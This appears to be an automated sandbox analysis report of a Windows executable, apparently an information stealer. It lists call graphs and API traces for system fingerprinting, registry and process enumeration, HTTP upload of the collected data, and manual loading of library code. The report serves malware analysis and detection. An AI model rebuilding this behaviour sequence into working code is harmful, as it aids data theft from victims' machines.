f7a8a0 lstrcpy 14702->14703 14704 f71d55 14703->14704 14705 f7a9b0 4 API calls 14704->14705 14706 f71d75 14705->14706 14707 f7a8a0 lstrcpy 14706->14707 14708 f71d7e 14707->14708 14709 f778e0 3 API calls 14708->14709 14710 f71d8e 14709->14710 14711 f7a9b0 4 API calls 14710->14711 14712 f71d9e 14711->14712 14713 f7a8a0 lstrcpy 14712->14713 14714 f71da7 14713->14714 14715 f7a9b0 4 API calls 14714->14715 14716 f71dc6 14715->14716 14717 f7a8a0 lstrcpy 
14716->14717 14718 f71dcf 14717->14718 14719 f7a9b0 4 API calls 14718->14719 14720 f71df0 14719->14720 14721 f7a8a0 lstrcpy 14720->14721 14722 f71df9 14721->14722 15383 f77980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14722->15383 14725 f7a9b0 4 API calls 14726 f71e19 14725->14726 14727 f7a8a0 lstrcpy 14726->14727 14728 f71e22 14727->14728 14729 f7a9b0 4 API calls 14728->14729 14730 f71e41 14729->14730 14731 f7a8a0 lstrcpy 14730->14731 14732 f71e4a 14731->14732 14733 f7a9b0 4 API calls 14732->14733 14734 f71e6b 14733->14734 14735 f7a8a0 lstrcpy 14734->14735 14736 f71e74 14735->14736 15385 f77a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14736->15385 14739 f7a9b0 4 API calls 14740 f71e94 14739->14740 14741 f7a8a0 lstrcpy 14740->14741 14742 f71e9d 14741->14742 14743 f7a9b0 4 API calls 14742->14743 14744 f71ebc 14743->14744 14745 f7a8a0 lstrcpy 14744->14745 14746 f71ec5 14745->14746 14747 f7a9b0 4 API calls 14746->14747 14748 f71ee5 14747->14748 14749 f7a8a0 lstrcpy 14748->14749 14750 f71eee 14749->14750 15388 f77b00 GetUserDefaultLocaleName 14750->15388 14753 f7a9b0 4 API calls 14754 f71f0e 14753->14754 14755 f7a8a0 lstrcpy 14754->14755 14756 f71f17 14755->14756 14757 f7a9b0 4 API calls 14756->14757 14758 f71f36 14757->14758 14759 f7a8a0 lstrcpy 14758->14759 14760 f71f3f 14759->14760 14761 f7a9b0 4 API calls 14760->14761 14762 f71f60 14761->14762 14763 f7a8a0 lstrcpy 14762->14763 14764 f71f69 14763->14764 15392 f77b90 14764->15392 14766 f71f80 14767 f7a920 3 API calls 14766->14767 14768 f71f93 14767->14768 14769 f7a8a0 lstrcpy 14768->14769 14770 f71f9c 14769->14770 14771 f7a9b0 4 API calls 14770->14771 14772 f71fc6 14771->14772 14773 f7a8a0 lstrcpy 14772->14773 14774 f71fcf 14773->14774 14775 f7a9b0 4 API calls 14774->14775 14776 f71fef 14775->14776 14777 f7a8a0 lstrcpy 14776->14777 14778 f71ff8 14777->14778 15404 f77d80 GetSystemPowerStatus 14778->15404 14781 f7a9b0 4 API calls 14782 f72018 14781->14782 14783 f7a8a0 lstrcpy 14782->14783 14784 
f72021 14783->14784 14785 f7a9b0 4 API calls 14784->14785 14786 f72040 14785->14786 14787 f7a8a0 lstrcpy 14786->14787 14788 f72049 14787->14788 14789 f7a9b0 4 API calls 14788->14789 14790 f7206a 14789->14790 14791 f7a8a0 lstrcpy 14790->14791 14792 f72073 14791->14792 14793 f7207e GetCurrentProcessId 14792->14793 15406 f79470 OpenProcess 14793->15406 14796 f7a920 3 API calls 14797 f720a4 14796->14797 14798 f7a8a0 lstrcpy 14797->14798 14799 f720ad 14798->14799 14800 f7a9b0 4 API calls 14799->14800 14801 f720d7 14800->14801 14802 f7a8a0 lstrcpy 14801->14802 14803 f720e0 14802->14803 14804 f7a9b0 4 API calls 14803->14804 14805 f72100 14804->14805 14806 f7a8a0 lstrcpy 14805->14806 14807 f72109 14806->14807 15411 f77e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14807->15411 14810 f7a9b0 4 API calls 14811 f72129 14810->14811 14812 f7a8a0 lstrcpy 14811->14812 14813 f72132 14812->14813 14814 f7a9b0 4 API calls 14813->14814 14815 f72151 14814->14815 14816 f7a8a0 lstrcpy 14815->14816 14817 f7215a 14816->14817 14818 f7a9b0 4 API calls 14817->14818 14819 f7217b 14818->14819 14820 f7a8a0 lstrcpy 14819->14820 14821 f72184 14820->14821 15415 f77f60 14821->15415 14824 f7a9b0 4 API calls 14825 f721a4 14824->14825 14826 f7a8a0 lstrcpy 14825->14826 14827 f721ad 14826->14827 14828 f7a9b0 4 API calls 14827->14828 14829 f721cc 14828->14829 14830 f7a8a0 lstrcpy 14829->14830 14831 f721d5 14830->14831 14832 f7a9b0 4 API calls 14831->14832 14833 f721f6 14832->14833 14834 f7a8a0 lstrcpy 14833->14834 14835 f721ff 14834->14835 15428 f77ed0 GetSystemInfo wsprintfA 14835->15428 14838 f7a9b0 4 API calls 14839 f7221f 14838->14839 14840 f7a8a0 lstrcpy 14839->14840 14841 f72228 14840->14841 14842 f7a9b0 4 API calls 14841->14842 14843 f72247 14842->14843 14844 f7a8a0 lstrcpy 14843->14844 14845 f72250 14844->14845 14846 f7a9b0 4 API calls 14845->14846 14847 f72270 14846->14847 14848 f7a8a0 lstrcpy 14847->14848 14849 f72279 14848->14849 15430 f78100 GetProcessHeap RtlAllocateHeap 14849->15430 14852 
f7a9b0 4 API calls 14853 f72299 14852->14853 14854 f7a8a0 lstrcpy 14853->14854 14855 f722a2 14854->14855 14856 f7a9b0 4 API calls 14855->14856 14857 f722c1 14856->14857 14858 f7a8a0 lstrcpy 14857->14858 14859 f722ca 14858->14859 14860 f7a9b0 4 API calls 14859->14860 14861 f722eb 14860->14861 14862 f7a8a0 lstrcpy 14861->14862 14863 f722f4 14862->14863 15436 f787c0 14863->15436 14866 f7a920 3 API calls 14867 f7231e 14866->14867 14868 f7a8a0 lstrcpy 14867->14868 14869 f72327 14868->14869 14870 f7a9b0 4 API calls 14869->14870 14871 f72351 14870->14871 14872 f7a8a0 lstrcpy 14871->14872 14873 f7235a 14872->14873 14874 f7a9b0 4 API calls 14873->14874 14875 f7237a 14874->14875 14876 f7a8a0 lstrcpy 14875->14876 14877 f72383 14876->14877 14878 f7a9b0 4 API calls 14877->14878 14879 f723a2 14878->14879 14880 f7a8a0 lstrcpy 14879->14880 14881 f723ab 14880->14881 15441 f781f0 14881->15441 14883 f723c2 14884 f7a920 3 API calls 14883->14884 14885 f723d5 14884->14885 14886 f7a8a0 lstrcpy 14885->14886 14887 f723de 14886->14887 14888 f7a9b0 4 API calls 14887->14888 14889 f7240a 14888->14889 14890 f7a8a0 lstrcpy 14889->14890 14891 f72413 14890->14891 14892 f7a9b0 4 API calls 14891->14892 14893 f72432 14892->14893 14894 f7a8a0 lstrcpy 14893->14894 14895 f7243b 14894->14895 14896 f7a9b0 4 API calls 14895->14896 14897 f7245c 14896->14897 14898 f7a8a0 lstrcpy 14897->14898 14899 f72465 14898->14899 14900 f7a9b0 4 API calls 14899->14900 14901 f72484 14900->14901 14902 f7a8a0 lstrcpy 14901->14902 14903 f7248d 14902->14903 14904 f7a9b0 4 API calls 14903->14904 14905 f724ae 14904->14905 14906 f7a8a0 lstrcpy 14905->14906 14907 f724b7 14906->14907 15449 f78320 14907->15449 14909 f724d3 14910 f7a920 3 API calls 14909->14910 14911 f724e6 14910->14911 14912 f7a8a0 lstrcpy 14911->14912 14913 f724ef 14912->14913 14914 f7a9b0 4 API calls 14913->14914 14915 f72519 14914->14915 14916 f7a8a0 lstrcpy 14915->14916 14917 f72522 14916->14917 14918 f7a9b0 4 API calls 14917->14918 14919 f72543 14918->14919 
14920 f7a8a0 lstrcpy 14919->14920 14921 f7254c 14920->14921 14922 f78320 17 API calls 14921->14922 14923 f72568 14922->14923 14924 f7a920 3 API calls 14923->14924 14925 f7257b 14924->14925 14926 f7a8a0 lstrcpy 14925->14926 14927 f72584 14926->14927 14928 f7a9b0 4 API calls 14927->14928 14929 f725ae 14928->14929 14930 f7a8a0 lstrcpy 14929->14930 14931 f725b7 14930->14931 14932 f7a9b0 4 API calls 14931->14932 14933 f725d6 14932->14933 14934 f7a8a0 lstrcpy 14933->14934 14935 f725df 14934->14935 14936 f7a9b0 4 API calls 14935->14936 14937 f72600 14936->14937 14938 f7a8a0 lstrcpy 14937->14938 14939 f72609 14938->14939 15485 f78680 14939->15485 14941 f72620 14942 f7a920 3 API calls 14941->14942 14943 f72633 14942->14943 14944 f7a8a0 lstrcpy 14943->14944 14945 f7263c 14944->14945 14946 f7265a lstrlen 14945->14946 14947 f7266a 14946->14947 14948 f7a740 lstrcpy 14947->14948 14949 f7267c 14948->14949 14950 f61590 lstrcpy 14949->14950 14951 f7268d 14950->14951 15495 f75190 14951->15495 14953 f72699 14953->13385 15683 f7aad0 14954->15683 14956 f65009 InternetOpenUrlA 14960 f65021 14956->14960 14957 f650a0 InternetCloseHandle InternetCloseHandle 14959 f650ec 14957->14959 14958 f6502a InternetReadFile 14958->14960 14959->13389 14960->14957 14960->14958 15684 f698d0 14961->15684 14963 f70759 14964 f7077d 14963->14964 14965 f70a38 14963->14965 14967 f70799 StrCmpCA 14964->14967 14966 f61590 lstrcpy 14965->14966 14968 f70a49 14966->14968 14969 f707a8 14967->14969 14996 f70843 14967->14996 15860 f70250 14968->15860 14971 f7a7a0 lstrcpy 14969->14971 14974 f707c3 14971->14974 14973 f70865 StrCmpCA 14975 f70874 14973->14975 15013 f7096b 14973->15013 14976 f61590 lstrcpy 14974->14976 14977 f7a740 lstrcpy 14975->14977 14978 f7080c 14976->14978 14980 f70881 14977->14980 14981 f7a7a0 lstrcpy 14978->14981 14979 f7099c StrCmpCA 14982 f709ab 14979->14982 15002 f70a2d 14979->15002 14983 f7a9b0 4 API calls 14980->14983 14984 f70823 14981->14984 14985 f61590 lstrcpy 14982->14985 14986 f708ac 
14983->14986 14987 f7a7a0 lstrcpy 14984->14987 14988 f709f4 14985->14988 14989 f7a920 3 API calls 14986->14989 14990 f7083e 14987->14990 14991 f7a7a0 lstrcpy 14988->14991 14992 f708b3 14989->14992 15687 f6fb00 14990->15687 14994 f70a0d 14991->14994 14995 f7a9b0 4 API calls 14992->14995 14997 f7a7a0 lstrcpy 14994->14997 14998 f708ba 14995->14998 14996->14973 14999 f70a28 14997->14999 15000 f7a8a0 lstrcpy 14998->15000 15803 f70030 14999->15803 15002->13393 15013->14979 15335 f7a7a0 lstrcpy 15334->15335 15336 f61683 15335->15336 15337 f7a7a0 lstrcpy 15336->15337 15338 f61695 15337->15338 15339 f7a7a0 lstrcpy 15338->15339 15340 f616a7 15339->15340 15341 f7a7a0 lstrcpy 15340->15341 15342 f615a3 15341->15342 15342->14216 15344 f647c6 15343->15344 15345 f64838 lstrlen 15344->15345 15369 f7aad0 15345->15369 15347 f64848 InternetCrackUrlA 15348 f64867 15347->15348 15348->14293 15350 f7a740 lstrcpy 15349->15350 15351 f78b74 15350->15351 15352 f7a740 lstrcpy 15351->15352 15353 f78b82 GetSystemTime 15352->15353 15355 f78b99 15353->15355 15354 f7a7a0 lstrcpy 15356 f78bfc 15354->15356 15355->15354 15356->14308 15358 f7a931 15357->15358 15359 f7a988 15358->15359 15362 f7a968 lstrcpy lstrcat 15358->15362 15360 f7a7a0 lstrcpy 15359->15360 15361 f7a994 15360->15361 15361->14311 15362->15359 15363->14426 15365 f64eee 15364->15365 15366 f69af9 LocalAlloc 15364->15366 15365->14314 15365->14317 15366->15365 15367 f69b14 CryptStringToBinaryA 15366->15367 15367->15365 15368 f69b39 LocalFree 15367->15368 15368->15365 15369->15347 15370->14436 15371->14577 15372->14579 15373->14587 15502 f777a0 15374->15502 15377 f776c6 RegOpenKeyExA 15379 f776e7 RegQueryValueExA 15377->15379 15380 f77704 RegCloseKey 15377->15380 15378 f71c1e 15378->14669 15379->15380 15380->15378 15382 f71c99 15381->15382 15382->14683 15384 f71e09 15383->15384 15384->14725 15386 f71e84 15385->15386 15387 f77a9a wsprintfA 15385->15387 15386->14739 15387->15386 15389 f71efe 15388->15389 15390 f77b4d 15388->15390 15389->14753 
15509 f78d20 LocalAlloc CharToOemW 15390->15509 15393 f7a740 lstrcpy 15392->15393 15394 f77bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15393->15394 15403 f77c25 15394->15403 15395 f77c46 GetLocaleInfoA 15395->15403 15396 f77d18 15397 f77d1e LocalFree 15396->15397 15398 f77d28 15396->15398 15397->15398 15400 f7a7a0 lstrcpy 15398->15400 15399 f7a9b0 lstrcpy lstrlen lstrcpy lstrcat 15399->15403 15402 f77d37 15400->15402 15401 f7a8a0 lstrcpy 15401->15403 15402->14766 15403->15395 15403->15396 15403->15399 15403->15401 15405 f72008 15404->15405 15405->14781 15407 f794b5 15406->15407 15408 f79493 GetModuleFileNameExA CloseHandle 15406->15408 15409 f7a740 lstrcpy 15407->15409 15408->15407 15410 f72091 15409->15410 15410->14796 15412 f72119 15411->15412 15413 f77e68 RegQueryValueExA 15411->15413 15412->14810 15414 f77e8e RegCloseKey 15413->15414 15414->15412 15416 f77fb9 GetLogicalProcessorInformationEx 15415->15416 15417 f77fd8 GetLastError 15416->15417 15423 f78029 15416->15423 15418 f78022 15417->15418 15427 f77fe3 15417->15427 15421 f72194 15418->15421 15422 f789f0 2 API calls 15418->15422 15421->14824 15422->15421 15424 f789f0 2 API calls 15423->15424 15425 f7807b 15424->15425 15425->15418 15426 f78084 wsprintfA 15425->15426 15426->15421 15427->15416 15427->15421 15510 f789f0 15427->15510 15513 f78a10 GetProcessHeap RtlAllocateHeap 15427->15513 15429 f7220f 15428->15429 15429->14838 15431 f789b0 15430->15431 15432 f7814d GlobalMemoryStatusEx 15431->15432 15435 f78163 15432->15435 15433 f7819b wsprintfA 15434 f72289 15433->15434 15434->14852 15435->15433 15437 f787fb GetProcessHeap RtlAllocateHeap wsprintfA 15436->15437 15439 f7a740 lstrcpy 15437->15439 15440 f7230b 15439->15440 15440->14866 15442 f7a740 lstrcpy 15441->15442 15443 f78229 15442->15443 15444 f78263 15443->15444 15447 f7a9b0 lstrcpy lstrlen lstrcpy lstrcat 15443->15447 15448 f7a8a0 lstrcpy 15443->15448 15445 f7a7a0 lstrcpy 15444->15445 15446 f782dc 15445->15446 15446->14883 15447->15443 
15448->15443 15450 f7a740 lstrcpy 15449->15450 15451 f7835c RegOpenKeyExA 15450->15451 15452 f783d0 15451->15452 15453 f783ae 15451->15453 15455 f78613 RegCloseKey 15452->15455 15456 f783f8 RegEnumKeyExA 15452->15456 15454 f7a7a0 lstrcpy 15453->15454 15465 f783bd 15454->15465 15457 f7a7a0 lstrcpy 15455->15457 15458 f7843f wsprintfA RegOpenKeyExA 15456->15458 15459 f7860e 15456->15459 15457->15465 15460 f78485 RegCloseKey RegCloseKey 15458->15460 15461 f784c1 RegQueryValueExA 15458->15461 15459->15455 15462 f7a7a0 lstrcpy 15460->15462 15463 f78601 RegCloseKey 15461->15463 15464 f784fa lstrlen 15461->15464 15462->15465 15463->15459 15464->15463 15466 f78510 15464->15466 15465->14909 15467 f7a9b0 4 API calls 15466->15467 15468 f78527 15467->15468 15469 f7a8a0 lstrcpy 15468->15469 15470 f78533 15469->15470 15471 f7a9b0 4 API calls 15470->15471 15472 f78557 15471->15472 15473 f7a8a0 lstrcpy 15472->15473 15474 f78563 15473->15474 15475 f7856e RegQueryValueExA 15474->15475 15475->15463 15476 f785a3 15475->15476 15477 f7a9b0 4 API calls 15476->15477 15478 f785ba 15477->15478 15479 f7a8a0 lstrcpy 15478->15479 15480 f785c6 15479->15480 15481 f7a9b0 4 API calls 15480->15481 15482 f785ea 15481->15482 15483 f7a8a0 lstrcpy 15482->15483 15484 f785f6 15483->15484 15484->15463 15486 f7a740 lstrcpy 15485->15486 15487 f786bc CreateToolhelp32Snapshot Process32First 15486->15487 15488 f7875d CloseHandle 15487->15488 15489 f786e8 Process32Next 15487->15489 15490 f7a7a0 lstrcpy 15488->15490 15489->15488 15491 f786fd 15489->15491 15492 f78776 15490->15492 15491->15489 15493 f7a9b0 lstrcpy lstrlen lstrcpy lstrcat 15491->15493 15494 f7a8a0 lstrcpy 15491->15494 15492->14941 15493->15491 15494->15491 15496 f7a7a0 lstrcpy 15495->15496 15497 f751b5 15496->15497 15498 f61590 lstrcpy 15497->15498 15499 f751c6 15498->15499 15514 f65100 15499->15514 15501 f751cf 15501->14953 15505 f77720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15502->15505 15504 f776b9 15504->15377 15504->15378 15506 f77765 
RegQueryValueExA 15505->15506 15507 f77780 RegCloseKey 15505->15507 15506->15507 15508 f77793 15507->15508 15508->15504 15509->15389 15511 f78a0c 15510->15511 15512 f789f9 GetProcessHeap HeapFree 15510->15512 15511->15427 15512->15511 15513->15427 15515 f7a7a0 lstrcpy 15514->15515 15516 f65119 15515->15516 15517 f647b0 2 API calls 15516->15517 15518 f65125 15517->15518 15674 f78ea0 15518->15674 15520 f65184 15521 f65192 lstrlen 15520->15521 15522 f651a5 15521->15522 15523 f78ea0 4 API calls 15522->15523 15524 f651b6 15523->15524 15525 f7a740 lstrcpy 15524->15525 15526 f651c9 15525->15526 15527 f7a740 lstrcpy 15526->15527 15528 f651d6 15527->15528 15529 f7a740 lstrcpy 15528->15529 15530 f651e3 15529->15530 15531 f7a740 lstrcpy 15530->15531 15532 f651f0 15531->15532 15533 f7a740 lstrcpy 15532->15533 15534 f651fd InternetOpenA StrCmpCA 15533->15534 15535 f6522f 15534->15535 15536 f658c4 InternetCloseHandle 15535->15536 15537 f78b60 3 API calls 15535->15537 15544 f658d9 ctype 15536->15544 15538 f6524e 15537->15538 15539 f7a920 3 API calls 15538->15539 15540 f65261 15539->15540 15541 f7a8a0 lstrcpy 15540->15541 15542 f6526a 15541->15542 15543 f7a9b0 4 API calls 15542->15543 15545 f652ab 15543->15545 15547 f7a7a0 lstrcpy 15544->15547 15546 f7a920 3 API calls 15545->15546 15548 f652b2 15546->15548 15555 f65913 15547->15555 15549 f7a9b0 4 API calls 15548->15549 15550 f652b9 15549->15550 15551 f7a8a0 lstrcpy 15550->15551 15552 f652c2 15551->15552 15553 f7a9b0 4 API calls 15552->15553 15554 f65303 15553->15554 15556 f7a920 3 API calls 15554->15556 15555->15501 15557 f6530a 15556->15557 15558 f7a8a0 lstrcpy 15557->15558 15559 f65313 15558->15559 15560 f65329 InternetConnectA 15559->15560 15560->15536 15561 f65359 HttpOpenRequestA 15560->15561 15563 f658b7 InternetCloseHandle 15561->15563 15564 f653b7 15561->15564 15563->15536 15565 f7a9b0 4 API calls 15564->15565 15566 f653cb 15565->15566 15567 f7a8a0 lstrcpy 15566->15567 15568 f653d4 15567->15568 15569 f7a920 3 API calls 
15568->15569 15570 f653f2 15569->15570 15571 f7a8a0 lstrcpy 15570->15571 15572 f653fb 15571->15572 15573 f7a9b0 4 API calls 15572->15573 15574 f6541a 15573->15574 15575 f7a8a0 lstrcpy 15574->15575 15576 f65423 15575->15576 15577 f7a9b0 4 API calls 15576->15577 15578 f65444 15577->15578 15579 f7a8a0 lstrcpy 15578->15579 15580 f6544d 15579->15580 15581 f7a9b0 4 API calls 15580->15581 15582 f6546e 15581->15582 15675 f78ead CryptBinaryToStringA 15674->15675 15676 f78ea9 15674->15676 15675->15676 15677 f78ece GetProcessHeap RtlAllocateHeap 15675->15677 15676->15520 15677->15676 15678 f78ef4 ctype 15677->15678 15679 f78f05 CryptBinaryToStringA 15678->15679 15679->15676 15683->14956 15926 f69880 15684->15926 15686 f698e1 15686->14963 15688 f7a740 lstrcpy 15687->15688 15861 f7a740 lstrcpy 15860->15861 15862 f70266 15861->15862 15863 f78de0 2 API calls 15862->15863 15864 f7027b 15863->15864 15865 f7a920 3 API calls 15864->15865 15866 f7028b 15865->15866 15867 f7a8a0 lstrcpy 15866->15867 15868 f70294 15867->15868 15869 f7a9b0 4 API calls 15868->15869 15927 f6988e 15926->15927 15930 f66fb0 15927->15930 15929 f698ad ctype 15929->15686 15933 f66d40 15930->15933 15934 f66d63 15933->15934 15948 f66d59 15933->15948 15949 f66530 15934->15949 15938 f66dbe 15938->15948 15959 f669b0 15938->15959 15940 f66e2a 15941 f66ee6 VirtualFree 15940->15941 15943 f66ef7 15940->15943 15940->15948 15941->15943 15942 f66f41 15946 f789f0 2 API calls 15942->15946 15942->15948 15943->15942 15944 f66f26 FreeLibrary 15943->15944 15945 f66f38 15943->15945 15944->15943 15947 f789f0 2 API calls 15945->15947 15946->15948 15947->15942 15948->15929 15950 f66542 15949->15950 15952 f66549 15950->15952 15969 f78a10 GetProcessHeap RtlAllocateHeap 15950->15969 15952->15948 15953 f66660 15952->15953 15956 f6668f VirtualAlloc 15953->15956 15955 f66730 15957 f66743 VirtualAlloc 15955->15957 15958 f6673c 15955->15958 15956->15955 15956->15958 15957->15958 15958->15938 15960 f669c9 15959->15960 15961 f669d5 15959->15961 
15960->15961 15962 f66a09 LoadLibraryA 15960->15962 15961->15940 15962->15961 15963 f66a32 15962->15963 15966 f66ae0 15963->15966 15970 f78a10 GetProcessHeap RtlAllocateHeap 15963->15970 15965 f66ba8 GetProcAddress 15965->15961 15965->15966 15966->15961 15966->15965 15967 f789f0 2 API calls 15967->15966 15968 f66a8b 15968->15961 15968->15967 15969->15952 15970->15968

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 f79860-f79874 call f79750 663 f79a93-f79af2 LoadLibraryA * 5 660->663 664 f7987a-f79a8e call f79780 GetProcAddress * 21 660->664 666 f79af4-f79b08 GetProcAddress 663->666 667 f79b0d-f79b14 663->667 664->663 666->667 668 f79b46-f79b4d 667->668 669 f79b16-f79b41 GetProcAddress * 2 667->669 671 f79b4f-f79b63 GetProcAddress 668->671 672 f79b68-f79b6f 668->672 669->668 671->672 673 f79b71-f79b84 GetProcAddress 672->673 674 f79b89-f79b90 672->674 673->674 675 f79b92-f79bbc GetProcAddress * 2 674->675 676 f79bc1-f79bc2 674->676 675->676
                                  APIs
                                  • GetProcAddress.KERNEL32(75550000,016F0618), ref: 00F798A1
                                  • GetProcAddress.KERNEL32(75550000,016F07E0), ref: 00F798BA
                                  • GetProcAddress.KERNEL32(75550000,016F0720), ref: 00F798D2
                                  • GetProcAddress.KERNEL32(75550000,016F07F8), ref: 00F798EA
                                  • GetProcAddress.KERNEL32(75550000,016F0840), ref: 00F79903
                                  • GetProcAddress.KERNEL32(75550000,016F8860), ref: 00F7991B
                                  • GetProcAddress.KERNEL32(75550000,016E6500), ref: 00F79933
                                  • GetProcAddress.KERNEL32(75550000,016E6620), ref: 00F7994C
                                  • GetProcAddress.KERNEL32(75550000,016F0588), ref: 00F79964
                                  • GetProcAddress.KERNEL32(75550000,016F05A0), ref: 00F7997C
                                  • GetProcAddress.KERNEL32(75550000,016F0660), ref: 00F79995
                                  • GetProcAddress.KERNEL32(75550000,016F0678), ref: 00F799AD
                                  • GetProcAddress.KERNEL32(75550000,016E6360), ref: 00F799C5
                                  • GetProcAddress.KERNEL32(75550000,016F05D0), ref: 00F799DE
                                  • GetProcAddress.KERNEL32(75550000,016F05E8), ref: 00F799F6
                                  • GetProcAddress.KERNEL32(75550000,016E6660), ref: 00F79A0E
                                  • GetProcAddress.KERNEL32(75550000,016F0690), ref: 00F79A27
                                  • GetProcAddress.KERNEL32(75550000,016F0900), ref: 00F79A3F
                                  • GetProcAddress.KERNEL32(75550000,016E65E0), ref: 00F79A57
                                  • GetProcAddress.KERNEL32(75550000,016F08B8), ref: 00F79A70
                                  • GetProcAddress.KERNEL32(75550000,016E6600), ref: 00F79A88
                                  • LoadLibraryA.KERNEL32(016F08E8,?,00F76A00), ref: 00F79A9A
                                  • LoadLibraryA.KERNEL32(016F08D0,?,00F76A00), ref: 00F79AAB
                                  • LoadLibraryA.KERNEL32(016F0870,?,00F76A00), ref: 00F79ABD
                                  • LoadLibraryA.KERNEL32(016F0918,?,00F76A00), ref: 00F79ACF
                                  • LoadLibraryA.KERNEL32(016F0888,?,00F76A00), ref: 00F79AE0
                                  • GetProcAddress.KERNEL32(75670000,016F0858), ref: 00F79B02
                                  • GetProcAddress.KERNEL32(75750000,016F08A0), ref: 00F79B23
                                  • GetProcAddress.KERNEL32(75750000,016F8DF0), ref: 00F79B3B
                                  • GetProcAddress.KERNEL32(76BE0000,016F8EE0), ref: 00F79B5D
                                  • GetProcAddress.KERNEL32(759D0000,016E6460), ref: 00F79B7E
                                  • GetProcAddress.KERNEL32(773F0000,016F88A0), ref: 00F79B9F
                                  • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 00F79BB6
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00F79BAA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: fdb308ecdcd158cebec9e7ce6dbdbb2992e5331277049395aa64b5b79edfd418
                                  • Instruction ID: e5b84c37a9f284f10df3e7920aa9e3cd222a8f09a2a9c781b1afbde8fccb9894
                                  • Opcode Fuzzy Hash: fdb308ecdcd158cebec9e7ce6dbdbb2992e5331277049395aa64b5b79edfd418
                                  • Instruction Fuzzy Hash: 27A12EB55046509FD3BCDFA8F5889663FF9FF88702784853AA62A8324CD63A94C1DB50

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 677 f645c0-f64695 RtlAllocateHeap 694 f646a0-f646a6 677->694 695 f6474f-f647a9 VirtualProtect 694->695 696 f646ac-f6474a 694->696 696->694
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F6460F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00F6479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F646D8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F6474F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F645E8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64662
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64678
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64734
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F6462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F6475A
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F645F3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64683
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64770
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F645D2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F646C2
